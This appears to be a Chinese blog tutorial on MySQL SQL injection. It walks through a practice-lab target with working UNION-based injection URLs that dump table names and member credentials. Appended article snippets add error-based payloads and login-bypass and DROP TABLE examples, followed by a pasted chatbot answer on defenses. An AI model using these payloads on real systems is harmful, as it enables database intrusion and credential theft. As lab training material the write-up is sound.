MYSQL注入

最新推荐文章于 2022-12-20 22:41:04 发布
最新推荐文章于 2022-12-20 22:41:04 发布
阅读量602 收藏
点赞数
分类专栏: sql注入 文章标签: 其他 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Khazking/article/details/121410465
版权

 注:MYSQL5.0以上为高版本,5.0以下为低版本

MYSQL相关知识

1.MYSQL数据库
数据库A=网站A=数据库用户A
表名
        列名
                                数据
数据库B=网站B=数据库用户B
。。。。。。
数据库C=网站C=数据库用户C
。。。。。。

2.在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。

3.数据库中符号"."代表下一级,如xiaodi.user表示xiaodi数据库下的user表名。

4.常用参数

information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
table_name:表名
column_name:列名
table_schema:数据库名
user() 查看当前MySQL登录的用户名
database() 查看当前使用MySQL数据库名
version() 查看当前MySQL版本

5.MySQL 里分页一般用 LIMIT 来实现:

select* from article LIMIT 1,3
与
select * from article LIMIT 3 OFFSET 1

上面两种写法都表示取 2、3、4 三条条数据:

当 LIMIT 后面跟两个参数的时候,第一个数表示要跳过的数量,后一位表示要取的数量,例如:

select* from article LIMIT 1,3 就是跳过 1 条数据,从第 2 条数据开始取,取 3 条数据,也就是取 2、3、4 三条数据。

当 LIMIT 后面跟一个参数的时候,该参数表示要取的数据的数量。

例如 select* from article LIMIT 3 表示直接取前三条数据,类似 sqlserver 里的 top 语法。

当 LIMIT 和 OFFSET 组合使用的时候,LIMIT 后面只能有一个参数,表示要取的的数量,OFFSET表示要跳过的数量 。

例如 select * from article LIMIT 3 OFFSET 1 表示跳过 1 条数据,从第 2 条数据开始取,取3条数据,也就是取 2、3、4 三条数据。

墨者mysql靶场

点击平台停机维护通知

1.利用order by判断字段数,为下一步的union select做准备

构造order by 5时页面显示空白,说明有四列

order by:

数据库

  COL_A                       COL_B  
  ----------   ----------  
  A                                       1  
  D                                       5 
  B                                       3  
  C                                       4  

order by 1  按第一列排(默认升序) ps:降序order by 1 desc

 COL_A                       COL_B  
  ----------   ----------  
  A                                       1  
  B                                       3  
  C                                       4  

   D                                      5 

order by 2 按第二列排(默认升序)

此时ord by 3报错

总结:

order by A,B        这个时候都是默认按升序排列
order by A desc,B   这个时候 A 降序,B 升序排列
order by A ,B desc  这个时候 A 升序,B 降序排列

即 desc 或者 asc 只对它紧跟着的第一个列名有效,其他不受影响,仍然是默认的升序。

并且可以通过ord by x来判断有有几列

2.利用 union select 1,2,3,4 联合查询,将id值设置成不成立(id=-1/id=1 and 假),即可探测到可利用的字段数

 可以发现第二列和第三列的数据是可获取的

这里用到的知识 sql注入中的union select 1,2,3...._北遇-优快云博客

3.信息收集

将2,3替换为要查询的信息

 

获取数据库版本:version() 
获取数据库名字:database() 
获取数据库用户:user() 
获取操作系统:@@version_compile_os Linux 

4.查询数据库表

#查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:
http://219.153.49.228:43230/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

#查询指定表名StormGroup_member下的列名信息
http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member' 

#查询指定数据
http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

 

 

 发现登录不行

#查询指定数据
http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

 

 ok!

史上最完整的MySQL注入
xiaoi123的博客
09-07 1万+
作者:Passerby2 原文来自:史上最完整的MySQL注入 免责声明:本教程仅用于教育目的,以保护您自己的SQL注释代码。 在阅读本教程后,您必须对任何行动承担全部责任。 0x00 ~ 背景 这篇文章题目为“为新手完成MySQL注入”,它旨在提供专门针对MySQL数据库的SQL注入的完整知识和工作方式,除了堆栈查询部分。 这里的第一个贡献...... 表中的内容 介绍 ...
mysql 高级注入_SQL高级注入
weixin_39638623的博客
01-19 236
SQL Injection Tutorial by Marezzi (MySQL) SQL注入教程由Marezzi(MySQL的)In this tutorial i will describe how sql injection works and how to在本教程中,我将介绍如何SQL注入工程和如何use it to get some useful information.用它来获取一些有...
Mysql5.0以下 手工注入
weixin_30585437的博客
05-12 816
order by 20 www. .com/product/introduction.php?id=-65 UNION SELECT user(),2 www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2 报错 Warning: mysql_fetch_array() expects parame...
mysql5.0注入_[Injection]对MYSQL 5.0服务器以上版本注入
weixin_42376799的博客
02-05 204
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error2. ord...
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 814
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
Mysql5.0以上 手工注入
weixin_30498921的博客
05-12 174
Mysql5.0以上 order by 23 http://www..com/productdet.php?&id=89 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,17,18,19,20,21,22 http://www..com/productdet.php?&i...
第01篇:MySQL注入点写WebShell的5种方式1
08-03
MySQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要...
mysql注入绕过技术
06-04
### MySQL注入绕过技术 #### 引言 在网络安全领域,SQL注入是一种常见的攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制数据库。针对这种威胁,许多开发者实施了过滤机制来防御潜在的SQL注入攻击。然而,...
MySQL注入绕开过滤的技巧总结
12-16
MySQL注入是一种常见的安全威胁,它发生在应用程序的输入数据未经适当验证就被用来构造SQL查询时。攻击者可以通过注入恶意SQL代码来获取、修改、甚至删除数据库中的敏感信息。本篇文章主要探讨了如何在过滤机制存在...
MYSQL 注入天书
03-04
MySQL注入是一种安全漏洞利用手段,攻击者通过在Web应用的输入字段中输入恶意SQL代码,试图操控后台数据库,以获取敏感信息或对数据库执行非授权操作。由于SQL注入攻击的危害性极大,对网站安全构成严重威胁,因此...
SQL注入MYSQL注入
qq_46047977的博客
09-14 385
information_schema MYSQL5.0以上版本中,再带一个名为information_schema的数据库,这个数据库存储这所有数据库名,表名和列名,可通过此数据库查询指定数据库下的表明和列名。 mysql> use information_schema; Database changed mysql> show tables; +---------------------------------------+ | Tables_in_information_schema
MYSQL高版本报错注入技巧-利用NAME_CONST注入
weixin_30307921的博客
06-09 426
1、查看MYSQL版本 and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c) 2、爆所有库 and(select 1 from(select count(*),concat((select (sele...
mysql name const_MYSQL高版本报错注入技巧-利用NAME_CONST注入
weixin_42395462的博客
01-19 320
1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct ...
mysql注入爆表_MYSQL高版本报错注入技巧-利用NAME_CONST注入
weixin_29846499的博客
02-02 262
and (select count(*) from mysql.user)>0/*1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(select count...
浅谈Mysql注入
The current road is different, love needs to distinguish between right and wrong
11-30 4218
简介 sql注入就是一种通过操作输入来修改后台操作语句,把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到执行恶意的SQL命令来进行攻击的技术。 分类 按变量类型分: 数字型注入 字符型注入 按提交方式类型: GET注入 POST注入 Cookie注入注入方式类型: 报错注入 盲注 布尔盲注 时间盲注 union注入 编码类型: 宽字节注入 常见数据库识别: sql server #windows(iis) mysql..
SQL注入MySQL注入
weixin_51583033的博客
12-20 956
SQL注入MySQL注入
mysql 5.0 注入 区别_MySQL注入总结
weixin_33166692的博客
01-19 2146
0x01 MySQL 5.0以上和MySQL 5.0以下版本的区别MySQL5.0以上版本存在一个叫information_schema的数据库,它存储着数据库的所有信息,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型和访问权限等。而5.0以下没有。information_schema系统数据库,记录当前数据库的数据库,表,列,用户权限信息SCH...
Mysql 基本注入
大方子
06-03 1405
================================ 判断是否存在注入:    and 1=1 and 1=2 查看是否为mysql数据库: /*asd            ---因为只有mysql支持/* 注释查看mysql版本: and ord(mid(version(),1,1))>51 /*              --- 51的ASCII码代表3,即版本3具体确...
mysql注入
最新发布
03-28
<think>好的,我现在需要回答用户关于MySQL注入攻击的原理及防御措施的问题。首先,我得先理解用户的需求,他们可能想了解SQL注入MySQL中的具体应用以及如何防范。用户已经提供了两个引用,我需要结合这些信息来组织回答。 首先,SQL注入的原理,根据引用[1]和[2],都是通过恶意SQL语句的插入,欺骗服务器执行。比如在用户输入中嵌入SQL代码,比如用户名输入' OR '1'='1,这样可能会导致登录绕过。在MySQL中,攻击者可能利用特定语法,如注释符--或#,或者联合查询UNION来获取数据。需要详细说明这些例子,并确保用$...$格式包裹变量或代码片段。 接下来是防御措施。常见的包括参数化查询、输入验证、最小权限原则等。比如参数化查询在PHP中使用预处理语句,如PDO或mysqli。这里需要给出具体的代码示例,用```python这样的代码块,但用户提到的是MySQL,可能需要用PHP或其它语言的例子?或者用户希望看到MySQL层面的防御,比如存储过程?需要确认,但根据引用[2],预防措施提到了表单提交和插入到MySQL,所以可能涉及应用层和数据库层的措施。 另外,转义特殊字符也是重要的一点,比如使用mysql_real_escape_string函数,但需要注意这种方法不如参数化查询可靠。还有避免动态拼接SQL语句,这也是关键点。 需要确保回答结构清晰,分点说明原理和防御措施,每个部分有例子和解释。同时,按照用户的系统级指令,数学表达式和代码要用正确的格式,比如变量$username要用$包裹,代码块用三个反引号注明语言。 可能还需要生成相关问题,比如如何检测SQL注入漏洞,或者ORM框架如何防止注入,或者MySQL的具体配置来防御攻击。需要确保问题相关且有价值。 最后,检查是否所有行内代码和变量都用$...$,独立公式用$$...$$,虽然这个问题可能涉及较少的数学公式,但如果有比如示例中的查询条件,可能需要用LaTeX格式。例如,用户输入的变量$x$导致查询变成SELECT * FROM users WHERE id = $x$,这样的地方需要正确使用格式。 总结步骤: 1. 解释MySQL注入攻击的原理,举例说明。 2. 分点列出防御措施,每个措施详细说明,并给出代码示例。 3. 生成相关问题。 4. 确保格式正确,引用标识添加在引用内容末尾。</think>### MySQL注入攻击原理及防御措施 #### 一、MySQL注入攻击原理 MySQL注入是SQL注入的一种,攻击者通过构造恶意输入,篡改应用程序的SQL查询逻辑,从而执行非授权的数据库操作。其核心原理是**将用户输入直接拼接到SQL语句中**,导致数据库解析并执行恶意代码。例如: 1. **绕过身份验证**:若登录查询为 ```sql SELECT * FROM users WHERE username='$username' AND password='$password' ``` 攻击者输入`username = ' OR 1=1 -- `,则查询变为: ```sql SELECT * FROM users WHERE username='' OR 1=1 -- ' AND password='...' ``` 此时`1=1`恒成立,且`--`注释后续语句,直接登录成功[^1][^2]。 2. **数据泄露**:利用`UNION`查询获取其他表数据,如输入: ```sql ' UNION SELECT credit_card FROM payments -- ``` 3. **执行高危操作**:通过拼接`; DROP TABLE users`等语句删除表。 #### 二、防御措施 1. **参数化查询(预编译语句)** 使用占位符替代直接拼接输入,确保输入数据仅作为参数处理。例如PHP中使用PDO: ```php $stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username"); $stmt->execute(['username' => $username]); ``` 2. **输入验证与过滤** - 白名单验证:如仅允许邮箱格式的输入。 - 转义特殊字符:使用`mysqli_real_escape_string()`,但需注意其局限性[^2]。 3. **最小权限原则** 数据库账户按需分配权限,例如应用账号禁止执行`DROP`或`FILE`操作。 4. **启用严格模式** 配置MySQL的`sql_mode=STRICT_ALL_TABLES`,强制类型检查。 5. **错误信息隐藏** 避免将数据库错误直接返回给用户,防止泄露表结构等敏感信息。 #### 三、代码示例(PHP防御) ```php // 使用PDO参数化查询 $pdo = new PDO("mysql:host=localhost;dbname=test", "user", "pass"); $stmt = $pdo->prepare("SELECT * FROM users WHERE email = ?"); $stmt->execute([$_POST['email']]); $result = $stmt->fetchAll(); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值